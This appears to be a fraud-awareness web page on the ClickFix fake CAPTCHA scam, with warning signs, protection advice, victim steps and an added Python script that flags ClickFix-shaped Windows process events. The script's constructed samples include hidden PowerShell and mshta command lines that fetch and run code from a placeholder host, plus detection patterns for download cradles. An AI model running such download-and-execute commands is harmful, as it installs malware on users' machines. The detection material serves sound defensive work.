Established by a former federal investigator · 20+ years DOJ experience · $12.5B lost to fraud in 2024 — FTC
The Fraud Codex · Scam Intelligence
CRITICAL THREAT

Fake CAPTCHA (ClickFix) Scam

You hit a website, see a routine "Verify you are human" box, and it tells you to press a couple of keys to prove it. Those keystrokes don't prove anything — they paste and run a hidden command, so you install the malware yourself. Security researchers call it ClickFix, and in 2026 it became one of the most common ways attackers break into a device, because you do all the work and your antivirus never sees a file.

Losses: ClickFix attacks surged 517% in H1 2025 (ESET) and became the #2 initial-access vector globally; Microsoft attributed 47% of observed initial compromises to it
Targets: Anyone browsing the web — especially Windows users; increasingly aimed at employees to breach companies
Updated: 2026-06-16
Also known as: ClickFix · Fake CAPTCHA scam · Verify You Are Human scam · ClickFix malware · Fake verification scam · "I am not a robot" scam · Fix It scam
01 · How It Works

ClickFix flips the usual malware playbook: instead of tricking you into clicking a bad file, it tricks you into running the malicious command yourself — which is exactly why it slips past antivirus.

**The Setup:**

1. **The bait.** You land on a page — often through a poisoned ad, a hacked site, a phishing email, or a high-ranking search result — and see what looks like a normal CAPTCHA: "Verify you are human." Sometimes it's dressed up as a "fix this error" or "your browser needs updating" message.
2. **The "fix."** A prompt says the verification failed and you must complete "a few quick steps." There's usually a button like "Fix It," "How to Fix," or "I'm not a robot." Clicking it silently copies a command onto your clipboard — but installs nothing yet.
3. **You run it.** A pop-up walks you through pressing **Windows + R** (the Run dialog), then **Ctrl + V** to paste, then **Enter**. What you can see in the box reads something harmless like "I am not a robot" — but that's only the tail end of the text. The real command is hidden in front of it.
4. **The payload.** Pressing Enter runs a PowerShell command that quietly downloads and installs malware. From there, attackers can steal your passwords and crypto, drain accounts, watch your screen, or drop ransomware.

**Why it works so well:**

- **You do the dirty work.** Because you type and run the command yourself, there's no malicious attachment for email filters or antivirus to catch — in its first stage nothing is even written to disk.
- **It abuses trusted tools.** It uses built-in Windows utilities (PowerShell, the Run box), so security software sees "normal" activity.
- **MFA doesn't save you.** The attack hits your device, not your login, so even phishing-resistant two-factor authentication offers no protection.
- **It feels routine.** CAPTCHAs are everywhere, so a fake one doesn't raise alarm — that familiarity is the whole trick.
**The scale:** ESET recorded a 517% jump in ClickFix attacks in the first half of 2025, making it the second most common attack vector behind conventional phishing. Microsoft's 2025 Digital Defense Report tied 47% of observed initial compromises to the technique, and Recorded Future assessed it would remain the dominant initial-access method through 2026. In June 2026 both the FTC and Google issued public warnings about it.
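For the IT or security team that receives a report of one of these pages, the chain above leaves a distinctive trace in process-creation telemetry: Explorer (which hosts the Run box) starts a shell, and the command line carries a hidden-window or download pattern with the decoy phrase parked at the end. The script below is an added example written for this page, not code from The Fraud Codex or from any of the vendors it cites. It assumes Sysmon Event ID 1 (or Security 4688 with command-line auditing) has been exported as tab-separated Key=Value records using Sysmon's field names; that export format, the indicator list, and the scoring threshold are all the example's own choices, and the event records inside it are constructed, with an `.invalid` placeholder host, not real captures.

```python
"""Triage Windows process-creation events for the ClickFix execution chain.

Added example for this page; not code from The Fraud Codex or from the
vendors it cites. Assumes Sysmon Event ID 1 (or Security 4688 with
command-line auditing) exported as tab-separated Key=Value records, a
format chosen here for the example. The events below are constructed,
with an .invalid placeholder host; they are not real captures.
"""
import re
from dataclasses import dataclass, field

# Interpreters a Run-box ClickFix lure typically hands the pasted text to
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# The Run dialog is hosted by Explorer, so that is the parent we expect
RUN_BOX_PARENT = "explorer.exe"

# Command-line indicators; each one that fires adds one point to the score
INDICATORS = [
    ("hidden_window", re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)),
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download_cradle", re.compile(
        r"\b(?:iex|invoke-expression|irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b",
        re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
    # The decoy phrase the victim sees, parked behind a comment marker at the end
    ("captcha_tail", re.compile(r"#.*\b(?:i am not a robot|verify|human|captcha)\b\s*$", re.I)),
    ("bypass_policy", re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)),
]

# Constructed sample records (not real telemetry), one per line
SAMPLE_EVENTS = [
    # Benign: an admin opens the Run box and starts an ordinary PowerShell session
    "EventID=1\tParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tCommandLine=powershell.exe -NoProfile -Command Get-Service",
    # Benign: a build script spawned by an IDE, not from the Run box
    "EventID=1\tParentImage=C:\\Program Files\\Code\\Code.exe\tImage=C:\\Windows\\System32\\cmd.exe\tCommandLine=cmd.exe /c build.cmd --config Release --target all --verbose --out C:\\build\\artifacts\\release\\x64\\windows\\bundle\\latest",
    # ClickFix-shaped: Run box -> hidden PowerShell with a download cradle and a decoy tail
    "EventID=1\tParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\tCommandLine=powershell.exe -w hidden -ep bypass -c \"iex (irm https://fake-captcha.example.invalid/verify)\" # I am not a robot",
    # ClickFix-shaped variant: Run box -> mshta pulling a remote page, decoy tail
    "EventID=1\tParentImage=C:\\Windows\\explorer.exe\tImage=C:\\Windows\\System32\\mshta.exe\tCommandLine=mshta https://fake-captcha.example.invalid/check # Verify you are human",
]


@dataclass
class Finding:
    event_id: str
    image: str
    score: int
    hits: list = field(default_factory=list)


def parse_event(line: str) -> dict:
    """Split one tab-separated Key=Value record into a dict."""
    fields = {}
    for part in line.rstrip("\n").split("\t"):
        key, _, value = part.partition("=")
        fields[key] = value
    return fields


def basename(path: str) -> str:
    """Last path component, lower-cased, for Windows-style paths."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: dict):
    """Return the list of indicators that fire, or None if this is not a shell launch."""
    image = basename(ev.get("Image", ""))
    if image not in SHELLS:
        return None
    cmd = ev.get("CommandLine", "")
    hits = [name for name, rx in INDICATORS if rx.search(cmd)]
    if basename(ev.get("ParentImage", "")) == RUN_BOX_PARENT:
        hits.append("launched_from_explorer")
    # Anything a person really types into the Run box is short
    if len(cmd) > 150:
        hits.append("oversized_command")
    return hits


def triage(lines, threshold: int = 3) -> list:
    """Return a Finding for every event whose score reaches the threshold."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        hits = score_event(ev)
        if hits and len(hits) >= threshold:
            findings.append(Finding(ev.get("EventID", ""), basename(ev["Image"]), len(hits), hits))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.image} score={f.score} hits={', '.join(f.hits)}")
```

Run against the constructed records, the admin's Get-Service launch and the IDE build step score below the threshold, while the two Run-box launches with a remote URL and a decoy tail are flagged. The point of scoring rather than matching a single string is that the decoy phrase and the interpreter vary between campaigns, but the combination (Explorer parent, shell child, remote fetch, text that ends in a reassurance) does not. For the victim-response steps further down, the same Run-box history is also kept per user in the RunMRU registry key under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer`, which is worth preserving before a reinstall, and on managed fleets the "Remove Run menu from Start Menu" Group Policy setting removes the Windows + R entry point the lure depends on.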
How Scammers Make Contact
  • Compromised & malicious websites
  • Malvertising (poisoned ads)
  • Phishing emails & calendar invites
  • Fake "software update" pop-ups
  • Search-result links
02 · Warning Signs & Red Flags

  • A "CAPTCHA" or verification box asks you to press keyboard shortcuts (Windows + R, Ctrl + V, Enter) — real CAPTCHAs never do this
  • You are told to open the "Run" box, Terminal, or PowerShell to "verify" or "fix" something
  • Instructions to copy and paste text to prove you are human or to fix an error
  • A "verification failed" or "your browser is outdated" pop-up with a "Fix It" or "How to Fix" button
  • The text you are told to paste is long, even though only the end ("I am not a robot") looks harmless
  • Urgency or step-by-step hand-holding to complete the "fix" quickly
  • The prompt appears after clicking an ad, a search result, or an emailed link
03 · Real-World Example

"The page looked like an ordinary CAPTCHA, but instead of clicking pictures it said verification failed and to press Windows + R, paste, and hit Enter to fix it. The text ended in 'I am not a robot' — what victims don't see is the malicious command pasted in front of it, which runs PowerShell and installs the malware the moment they press Enter."

Microsoft Security analysis of the ClickFix technique, 2025
04 · How to Protect Yourself

  • Remember the rule: a real CAPTCHA NEVER asks you to press Windows + R, open a terminal, or paste anything
  • If a site tells you to run a command or keyboard shortcut to "verify," close the tab immediately
  • Never paste text into the Windows Run box, PowerShell, or Terminal unless you typed it yourself and know exactly what it does
  • Keep "Run" / clipboard caution in mind — clicking a button can silently copy a command onto your clipboard
  • Use an ad blocker and keep your browser updated to cut down on malvertising lures
  • Enable controlled folder access / reputable endpoint protection and keep Windows updated
  • On a work device, report the page to IT instead of following its instructions
  • Slow down — these attacks rely on familiarity and urgency to keep you from questioning the steps
05 · What To Do If You're a Victim

  1. Disconnect the device from the internet (Wi-Fi and ethernet) to cut off the attacker
  2. Run a full scan with reputable, updated antivirus/anti-malware; consider a professional cleanup or full reinstall for serious infections
  3. From a DIFFERENT, clean device, change passwords for email, banking, and crypto — starting with your most important accounts
  4. Turn on or reset two-factor authentication on key accounts
  5. Contact your bank and any exchanges; watch for unauthorized transactions and freeze cards if needed
  6. Check email rules/forwarding and connected apps for anything you did not set up
  7. Report to the FBI IC3 at ic3.gov and the FTC at reportfraud.ftc.gov
  8. If it happened on a work computer, notify your IT/security team immediately — assume corporate credentials are exposed
Frequently Asked Questions

How serious is this threat?

We rate this critical — among the most damaging schemes we track. Reported losses: ClickFix attacks surged 517% in H1 2025 (ESET) and became the #2 initial-access vector globally; Microsoft attributed 47% of observed initial compromises to it. Most exposed: Anyone browsing the web — especially Windows users; increasingly aimed at employees to breach companies.

Can I get my money back?

Recovery depends on how you paid. Credit card payments may be reversed through chargebacks, while wire transfers and cryptocurrency are rarely recoverable. Report immediately to your bank and file complaints with the FTC at reportfraud.ftc.gov and the FBI IC3 at ic3.gov.

How do I report the Fake CAPTCHA (ClickFix) scam?

Report to the FTC at reportfraud.ftc.gov. For internet crimes, file with the FBI IC3 at ic3.gov. For identity theft, visit identitytheft.gov. You should also contact your local police and your bank.
Sources & References
  1. FTC — How to spot a CAPTCHA scam (June 2026)
  2. Google — June 2026 frauds and scams advisory
  3. Microsoft Security — Analyzing the ClickFix social engineering technique
  4. Infosecurity Magazine — ClickFix Attacks Surge 517% in 2025
  5. ESET / Help Net Security — ClickFix fake CAPTCHA attacks skyrocketing